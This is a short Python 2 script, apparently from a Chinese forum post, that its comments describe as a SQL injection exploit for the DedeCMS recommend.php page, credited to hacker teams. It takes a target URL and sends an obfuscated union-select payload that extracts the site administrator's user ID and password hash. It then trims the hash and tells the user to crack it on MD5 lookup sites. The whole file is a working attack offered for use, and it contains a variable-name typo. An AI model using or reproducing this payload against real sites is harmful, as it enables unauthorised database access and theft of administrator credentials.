|
- #coding:GBK
- import re
- import urllib
- """
- dedecms recommend 注入 exp
- f4ck team
- v5ae team
- guest team
- """
- def md5chuli(md5):
- clhmd5=""
- md5len=len(md5)
- if md5len==32:
- clhmd=md5[6:25]
- clhmd5=clhmd[3:24]
- return clhmd5
- error=[]
- target=""
- target=raw_input("输入目标 要带有http哦!")
- b=r".+\..+\..+"
- d=re.findall(b,target)
- if d==error:
- print "你有毛病? 你输入的是链接么?"
- exit()
- else:
- print "start fuck"
- target2=target+"/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878"
- print target2
- url=urllib.urlopen(target2)
- page=url.read()
- print page
- pipei=r"<h2>|(.+)|.+|</h2>"
- print re.findall(pipei,page)
- pipeimd5=r"<h2>|.+|(.+)|</h2>"
- targetmd5=re.findall(pipeimd5,page)
- print md5chuli(rargetmd5)
- print "上面即为账号和密码其中之一组 MD5已经处理过 可以直接拿去各大MD5站进行解密"
- print "如果上面什么也没输出来 说明该站没此漏洞"
复制代码 |
|